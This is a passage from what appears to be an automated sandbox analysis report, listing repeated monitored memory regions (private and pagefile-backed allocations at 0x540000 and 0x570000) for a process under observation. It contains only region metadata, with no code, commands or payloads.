"pagefile_0x0000000000540000" filename = "" Region: id = 2638 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2663 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2664 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2665 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2666 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2699 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2700 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2701 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2702 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2725 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2726 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2727 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2728 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2749 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2750 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2751 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2752 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2754 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2755 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2756 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2757 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2765 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2766 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2767 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2768 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2770 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2771 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2772 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2773 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2774 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2775 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2776 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2777 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2779 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2780 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2781 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2782 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2788 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2789 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2790 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2791 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2794 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2795 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2796 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2797 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2798 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2799 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2800 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2801 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2802 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2803 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2804 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2805 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2949 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2950 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2951 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2952 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2953 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2954 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2955 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2956 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2958 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2959 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2960 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2961 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2966 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2967 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2968 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2969 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2971 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2972 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2973 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2974 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2975 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2976 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2977 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2978 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2979 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2980 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2981 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2982 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2983 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2984 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2985 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2986 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2987 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2988 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2989 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2990 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2992 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2993 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2994 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2995 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2998 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2999 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3000 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3001 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3005 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3006 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3007 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3008 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3009 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3010 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3011 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3012 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3014 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3015 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3016 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3017 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3020 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3021 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3022 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3023 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3024 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3025 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3026 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3027 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3029 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3030 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3031 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3032 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3034 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3035 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3036 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3037 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3039 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3040 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3041 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3042 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3051 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3052 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3053 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3054 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3056 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3057 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3058 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3059 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3060 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3061 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3062 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3063 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3065 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3066 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3067 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3068 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3070 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3071 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3072 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3073 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3074 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3075 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3076 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3077 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3079 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3081 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3082 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3083 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3084 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3085 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3086 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3087 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3089 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3090 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3091 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3092 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3095 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3096 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3097 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3098 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3099 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3100 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3101 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3102 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3104 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3106 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3107 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3108 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3109 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3110 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3111 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3112 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3114 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3115 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3116 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3117 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3119 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3120 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3121 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3122 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3124 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3125 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3126 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3127 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3128 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3129 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3130 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3131 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3132 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3133 start_va = 0x570000 end_va = 0x58ffff 